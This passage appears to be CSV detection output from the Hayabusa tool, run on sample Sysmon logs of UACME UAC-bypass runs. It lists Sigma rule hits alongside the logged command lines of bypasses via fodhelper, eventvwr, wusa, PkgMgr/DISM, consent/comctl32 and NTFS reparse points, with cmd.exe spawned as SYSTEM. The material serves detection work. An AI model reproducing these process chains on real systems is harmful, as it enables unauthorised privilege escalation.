Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx -2019-08-03 19:14:02.589 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 33 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe"" : Path: C:\Windows\System32\fodhelper.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: UACME.exe 33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 32 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0 : Path: 
C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: 
C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 30 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.619 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe"" : Path: C:\Windows\SysWOW64\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80 : Path: C:\Windows\SysWOW64\WerFault.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 23 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool 
UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml : Path: C:\Windows\System32\PkgMgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml"" : Path: 
C:\Windows\System32\Dism.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 22 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.372 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.753 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471300 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 4740 -s 128 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:16.853 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:19.915 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 318 0000028064471300",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:20.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.128 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\WerFault.exe -u -p 7564 -s 152 : Path: C:\Windows\System32\WerFault.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 
896 272 00000280644BC500,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:21.954 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Consent and Comctl32 - Process,,rules/sigma/process_creation/win_uac_bypass_consent_comctl32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.554 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: consent.exe 896 272 00000280644BC500",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:23.555 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:08:55.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 37 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:14.789 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 37",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:15.779 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:31:27.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC040 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_37_FileCreate.evtx -2019-08-03 21:32:34.577 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe 36 : Path: C:\Users\IEUser\Desktop\UACME.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:34.577 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.085 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 400 00000280644220C0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" /quiet C:\Users\IEUser\AppData\Local\Temp\update.msu : Path: C:\Windows\System32\wusa.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:35.531 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using NTFS Reparse Point - 
Process,,rules/sigma/process_creation/win_uac_bypass_ntfs_reparse_point.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.794 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:36.812 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064471E00 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.160 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dcomcnfg.exe"" : Path: C:\Windows\System32\dcomcnfg.exe : User: MSEDGEWIN10\IEUser : Parent Command: UACME.exe 36",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_36_FileCreate.evtx -2019-08-03 21:32:37.184 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\mmc.exe C:\Windows\system32\comexp.msc : Path: 